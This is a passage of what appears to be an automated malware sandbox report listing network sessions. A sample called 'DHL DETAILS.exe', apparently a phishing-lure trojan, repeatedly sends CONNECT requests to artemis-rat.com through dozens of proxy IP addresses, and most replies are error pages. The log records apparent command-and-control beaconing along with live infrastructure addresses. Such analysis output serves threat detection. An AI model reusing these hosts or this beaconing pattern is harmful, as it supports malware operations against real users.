Mar 9, 2024 13:14:19.993810892 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1579	192.168.2.5	54711	94.131.107.45	1080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838537931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.536488056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1580	192.168.2.5	50230	177.234.194.155	999	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838570118 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.492800951 CET	19	IN	HTTP/1.1 200 OK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1581	192.168.2.5	54727	203.222.24.36	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838640928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1582	192.168.2.5	54688	5.252.23.220	1081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838813066 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1583	192.168.2.5	54875	104.19.124.112	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838814974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.994204044 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1584	192.168.2.5	54877	172.64.152.98	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838854074 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.994440079 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1585	192.168.2.5	53892	81.199.14.49	1088	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838933945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1586	192.168.2.5	54734	218.252.244.126	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.838995934 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.142115116 CET	340	IN	HTTP/1.1 400 Bad Request Server: nginx/1.12.2 Date: Sat, 09 Mar 2024 12:14:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1587	192.168.2.5	54886	104.24.15.158	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.839073896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.994376898 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1588	192.168.2.5	54902	162.159.242.104	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.841696978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.002654076 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1589	192.168.2.5	54924	104.20.34.100	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.842283010 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:19.996866941 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1590	192.168.2.5	54669	216.9.224.113	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.842500925 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1591	192.168.2.5	54692	200.10.73.210	5678	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.844750881 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1592	192.168.2.5	54666	93.171.220.229	8888	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.876888037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1593	192.168.2.5	54947	104.19.5.247	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.879427910 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.034162998 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:19 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1594	192.168.2.5	54851	38.162.8.226	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.888360023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1595	192.168.2.5	54782	185.109.184.150	54565	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.888488054 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.601188898 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1596	192.168.2.5	54779	8.210.80.191	15673	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.888920069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1597	192.168.2.5	50171	148.72.206.250	35703	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.894824028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.942517996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:26.020715952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1598	192.168.2.5	54745	78.30.128.10	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.894826889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1599	192.168.2.5	54701	103.120.6.46	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.894911051 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.303878069 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1600	192.168.2.5	54856	191.102.160.157	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.895164967 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:20.118411064 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:20 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1601	192.168.2.5	54086	5.252.23.249	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.895591021 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1602	192.168.2.5	54741	195.87.217.75	3389	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:19.895592928 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1603	192.168.2.5	54921	153.92.214.224	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
